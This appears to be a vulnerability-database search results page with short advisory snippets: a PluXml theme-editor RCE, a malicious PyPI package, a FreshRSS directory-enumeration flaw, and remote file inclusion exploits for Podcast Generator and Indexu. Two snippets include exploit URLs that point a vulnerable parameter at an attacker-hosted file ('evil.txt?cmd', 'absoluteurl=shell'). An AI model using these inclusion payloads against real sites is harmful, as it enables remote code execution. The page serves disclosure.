10 matches found
CVE-2025-57567
A remote code execution RCE vulnerability exists in the PluXml CMS theme editor, specifically in the minify.php file located under the default theme directory /themes/defaut/css/minify.php. An authenticated administrator user can overwrite this file with arbitrary PHP code via the admin panel,...
EUVD-2025-31663
Malicious code in bioql PyPI...
CVE-2025-61586 FreshRSS is vulnerable to directory enumeration by setting path in its theme field
FreshRSS is a free, self-hostable RSS aggregator. Versions 1.26.3 and below are vulnerable to directory enumeration by setting path in theme field, allowing attackers to gain additional information about the server by checking if certain directories exist. This issue is fixed in version 1.27.0...
CVE-2025-61586
CVE-2025-61586 affects FreshRSS. Versions 1.26.3 and earlier are vulnerable to directory enumeration by manipulating the theme field path, allowing an attacker to determine existence of directories on the server and gain additional information. The issue is fixed in 1.27.0 . There are multiple co...
CVE-2025-61586 FreshRSS is vulnerable to directory enumeration by setting path in its theme field
FreshRSS is a free, self-hostable RSS aggregator. Versions 1.26.3 and below are vulnerable to directory enumeration by setting path in theme field, allowing attackers to gain additional information about the server by checking if certain directories exist. This issue is fixed in version 1.27.0...
PT-2025-39919
Name of the Vulnerable Software and Affected Versions FreshRSS versions 1.26.3 and below Description FreshRSS is susceptible to directory enumeration. By manipulating the theme field with a specific path, an attacker can determine the existence of directories on the server, potentially gaining...
podcast generator <= 1.2 globals[] Multiple Vulnerabilities
No description provided by source. ++ | Podcast Generator = 1.2 GLOBALS Multiple Remote Vulnerabilities | ++ | by staker - stakerathotmaildotit / http://zeroidentity.org | ++ +-------------------------------------------------------------------------------------+ | Remote/Local Arbitrary File...
podcast-rfidisclose.txt
Podcast Generator = 1.0 BETA 2 RFI / File Disclosure Remote Vulnerabilities http://sourceforge.net/project/showfiles.php?groupid=163847 POC : I- Remote File Inclusion Vulnerabilities /podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=shell...
Indexu-5.0.1.txt
Application : Indexu version : 5.0.0 5.0.1 URL : http://www.nicecoder.com/ Vulnerable: INDEXU = 5.0.1 themepathand basepath Remote File Inclusion Exploit Discovery by SnIpErSA in themepath this file : exploit: http://example.com/indexu/index.php?themepath=http://evil.txt?cmd...
INDEXU <= 5.0.1 (theme_path)and (base_path) Remote File Inclusion Exploit
Application : Indexu version : 5.0.0 5.0.1 URL : http://www.nicecoder.com/ Vulnerable: INDEXU = 5.0.1 themepathand basepath Remote File Inclusion Exploit Discovery by SnIpErSA in themepath this file : exploit: http://example.com/indexu/index.php?themepath=http://evil.txt?cmd...